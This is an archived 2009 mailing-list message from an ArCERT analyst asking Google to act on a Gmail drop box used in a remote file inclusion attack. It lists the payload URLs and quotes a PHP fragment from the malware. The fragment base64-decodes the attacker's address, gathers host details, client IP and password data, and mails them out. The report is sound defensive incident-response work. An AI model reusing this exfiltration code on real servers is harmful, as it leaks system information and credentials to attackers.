[nsp-sec] Attn google - gmail drop box - rfi attack
Rodolfo Baader
rbaader at arcert.gov.ar
Mon Jun 1 16:25:37 EDT 2009
Hi!
While investigating the following URLS involved in a RFI attack
-http://compraloenlinea.com.mx//copyright[1].txt
-http://compraloenlinea.com.mx//readme[1].txt
we found that the attacker was sending information to the following email address:
$creator="fr33sh3ll at gmail.com"
See below [*1] for part of the code we found.
Could you please investigate and take the appropriate actions.
Regards,
R.
*===========================================================
[*1] Piece of the code
...
$creator=base64_decode("ZnIzM3NoM2xsQGdtYWlsLmNvbQ==");
($safe_mode)?($safez="ON"):($safez="OFF_HEHE");
$base="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
$name = php_uname(); $ip = getenv("REMOTE_ADDR"); $ip2 =
gethostbyaddr($_SERVER[REMOTE_ADDR]); $subj = $_SERVER['HTTP_HOST'];
$msg = "\nBASE: $base\nuname a: $name\nBypass: $bypasser\nIP: $ip\nHost: $ip2
$pwds";
$from ="From: ".$writ."___=".$safez."<tool@".$_SERVER['HTTP_HOST'].">";
mail( $creator, $subj, $msg, $from);
*===========================================================
--
-----------------------------------------------
ArCERT - http://www.arcert.gov.ar
Te: (54-11) 4343-9001 int.512/514 | 4345-0383
Fax:(54-11) 4343-7458
Av.R. Saenz Peña 511 - Of:514
C1035AAA - Ciudad Autonoma de Buenos Aires
Argentina
-----------------------------------------------
More information about the nsp-security
mailing list